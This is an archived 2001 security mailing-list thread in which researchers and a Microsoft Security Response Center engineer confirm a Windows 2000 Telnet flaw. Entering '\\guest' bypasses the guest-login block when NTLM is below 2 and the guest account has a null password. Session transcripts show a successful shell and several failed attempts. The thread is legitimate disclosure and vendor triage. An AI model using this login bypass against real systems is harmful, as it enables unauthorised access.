Vulnerability Development mailing list archives
Re: (MSRC HES) : is this something?
From: Philip Stoev <philip () STOEV ORG>
Date: Thu, 18 Jan 2001 09:24:09 +0200
Looks like one needs to have an _enabled_ guest account and NTLM less than 2 in order to be vulnerable. Setting NTLM to 1 does not change this behavoir. If the guest account has a password on it, one needs to supply it. I also tried with the Administrator account -- one can get in using both \\Administrator and Administrator, however the password must be known. In brief, this seems to work only on enabled guest accounts with null passwords and NTLM less than 2. I think that there is something in Microsoft's telnet daemon that is meant to block guest logins, however it does not block \\guest ones and they go through fine if one knows the password. Philip Against NTLM = 0 and guest account _enabled_ with no password: Microsoft (R) Windows (TM) Version 5.00 (Build 2195) Welcome to Microsoft Telnet Service Telnet Server Build 5.00.99201.1 login: guest Login through Guest account not allowed login: \\guest password:[just hit ENTER] *=============================================================== Welcome to Microsoft Telnet Server. *=============================================================== C:\> Against NTLM = 0 and guest account _disabled_ with no password: Microsoft (R) Windows (TM) Version 5.00 (Build 2195) Welcome to Microsoft Telnet Service Telnet Server Build 5.00.99201.1 login: guest Login through Guest account not allowed login: \\guest password:[hit ENTER here] Logon failure: account currently disabled. ----- Original Message ----- From: "Microsoft Security Response Center" <secure () microsoft com> To: "Microsoft Security Response Center" <secure () microsoft com>; "'Philip Stoev'" <philip () stoev org> Sent: Wednesday, January 17, 2001 11:19 PM Subject: RE: (MSRC HES) : is this something?
Against Professional with NTLM at 0 Microsoft (R) Windows (TM) Version 5.00 (Build 2195) Welcome to Microsoft Telnet Service Telnet Server Build 5.00.99201.1 login: guest Login through Guest account not allowed login: \\guest password: Logon failure: account currently disabled. Login Failed login: ---------------------------------------------------- Against AD server with NTLM at 0 - Guest acct disabled and acct pwd is
null
Microsoft (R) Windows (TM) Version 5.00 (Build 2195) Welcome to Microsoft Telnet Service Telnet Server Build 5.00.99201.1 login: guest Login through Guest account not allowed login: \\guest password: Logon failure: unknown user name or bad password. Login Failed login: -----Original Message----- From: Microsoft Security Response Center Sent: Wednesday, January 17, 2001 1:13 PM To: 'Philip Stoev' Cc: Microsoft Security Response Center Subject: (MSRC HES) : is this something? Hi Philip - I'm having troubles verifying this. What NTLM setting are you using - 0,1,or 2? Are you just supplying a null password for Guest? I'm assuming that the Guest account pwd was not modified... I'm trying this against an AD Win2K Server. I'll try it against my WS
right
now... --eric -----Original Message----- From: Philip Stoev [mailto:philip () stoev org] Sent: Wednesday, January 17, 2001 11:29 AM To: sween; VULN-DEV () SECURITYFOCUS COM; Microsoft Security Response Center Subject: Re: is this something? I was able to confirm that on a vanilla, unpatched Windows 2000
Professional
without SP1 with NTLM set to 0. It seems to me that only Microsoft's
telnet
server is affected -- I also tried on a sshd server for Windows 2000 by Brandon Zehm <caspian () linuxfreak com>, however it does not appear to be affected. Philip ----- Original Message ----- From: "sween" <sween () MODELM ORG> To: <VULN-DEV () SECURITYFOCUS COM> Sent: Wednesday, January 17, 2001 8:29 AM Subject: is this something?I usually just browse through the messages on this list to play with peoples neat sploits and such...im going to get brave and post something I found playing around this evening... your thoughts on this: WINDOWS 2000Pro, Telnet service started with NTLM turned off... $ telnet 192.168.0.1 Trying 192.168.0.1... Connected to 192.168.0.1. Escape character is '^]'. Microsoft (R) Windows (TM) Version 5.00 (Build 2195) Welcome to Microsoft Telnet Service Telnet Server Build 5.00.99201.1 login: guest Login through Guest account not allowed login: \\guest password: *=============================================================== Welcome to Microsoft Telnet Server. *=============================================================== C:\> UNC dealy? misconfig? lack of config? lack of coffee? Thank you for your time. Ron Sweeney -sween --- | M | http://www.modelm.org --- "clickity, clack."
Current thread:
- Re: (MSRC HES) : is this something? Philip Stoev (Jan 18)